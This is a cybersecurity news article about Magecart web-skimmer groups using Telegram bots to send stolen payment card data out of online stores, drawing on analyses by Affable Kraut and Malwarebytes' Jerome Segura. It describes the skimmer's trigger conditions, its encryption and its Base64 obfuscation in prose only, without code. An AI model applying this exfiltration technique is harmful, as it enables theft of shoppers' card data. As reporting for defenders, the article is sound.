Magecart Groups Use Telegram Channels to Exfiltrate Stolen Card Data
Cybersecurity specialist known as Affable Kraut has discovered that web skimmer operators have started using Telegram channels to exfiltrate stolen user data. This conclusion is based on information from Sansec, a company specializing in combating digital skimming and Magecart attacks.
Originally, the name Magecart referred to a single hacker group that first began injecting web skimmers (malicious JavaScript) into online store pages to steal payment card data. However, this approach proved so successful that many copycat groups soon emerged, and the term Magecart became a generic label for this entire class of attacks. In 2018, RiskIQ researchers identified 12 such groups, but by the end of 2019, according to IBM, there were already about 40.
The researcher analyzed one of these malicious JavaScript scripts and noticed that it collects all data entered by victims into input fields and sends it to Telegram.
All transmitted information is encrypted using a public key, and once received, a special Telegram bot sends the stolen data to a chat as regular messages.
Affable Kraut notes that this data theft method appears to be quite effective, but it has a significant downside: anyone with the token for the Telegram bot can take control of the process.
Jerome Segura, the lead researcher at Malwarebytes, also took an interest in this script. After analyzing it, he reported that the author of this web skimmer used simple Base64 encoding for the bot ID, Telegram channel, and API requests. Below is a diagram provided by Segura that describes the entire attack process.
The researcher points out that data theft only occurs if the current browser URL contains certain keywords indicating it is an online store, and only when the user confirms a purchase. After that, the payment details are sent both to the payment processor and to the cybercriminals.
Segura writes that this data exfiltration mechanism is a very practical solution, as it allows attackers to avoid creating special infrastructure for these purposes. Moreover, defending against this type of skimmer is not easy. Blocking Telegram connections is only a temporary solution, since attackers can simply switch to another legitimate service to mask the data exfiltration.